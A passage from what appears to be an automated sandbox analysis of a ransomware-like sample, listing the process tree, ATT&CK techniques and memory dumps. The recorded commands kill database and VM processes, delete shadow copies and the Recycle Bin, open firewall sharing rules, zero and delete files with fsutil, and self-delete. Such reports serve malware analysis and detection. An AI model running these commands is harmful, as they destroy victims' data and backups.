  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3780
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1552
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3132
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2420
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3544
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1368
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3864
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2364
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2964
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:816
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3580
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:3128
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:916
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Инструкция.txt
  2⤵
  PID:1552
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:604
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:3680
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe
  2⤵
  PID:2776

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
1⤵
PID:3860

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2636-210-0x0000000009400000-0x0000000009401000-memory.dmp

Filesize
4KB

Download
memory/2636-209-0x000000000AB20000-0x000000000AB21000-memory.dmp

Filesize
4KB

Download
memory/2636-115-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/2636-119-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/2636-117-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2964-192-0x0000000007072000-0x0000000007073000-memory.dmp

Filesize
4KB

Download
memory/2964-190-0x0000000007EC0000-0x0000000007EC1000-memory.dmp

Filesize
4KB

Download
memory/2964-187-0x0000000007580000-0x0000000007581000-memory.dmp

Filesize
4KB

Download
memory/2964-185-0x0000000004B00000-0x0000000004B01000-memory.dmp

Filesize
4KB

Download
memory/2964-183-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/2964-208-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/2964-207-0x0000000007074000-0x0000000007076000-memory.dmp

Filesize
8KB

Download
memory/2964-184-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/2964-206-0x0000000007073000-0x0000000007074000-memory.dmp

Filesize
4KB

Download
memory/2964-196-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/2964-195-0x00000000085F0000-0x00000000085F1000-memory.dmp

Filesize
4KB

Download
memory/2964-194-0x0000000008350000-0x0000000008351000-memory.dmp

Filesize
4KB

Download
memory/2964-188-0x0000000007620000-0x0000000007621000-memory.dmp

Filesize
4KB

Download
memory/2964-186-0x00000000076B0000-0x00000000076B1000-memory.dmp

Filesize
4KB

Download
memory/2964-191-0x0000000007070000-0x0000000007071000-memory.dmp

Filesize
4KB

Download
memory/2964-193-0x0000000008210000-0x0000000008211000-memory.dmp

Filesize
4KB

Download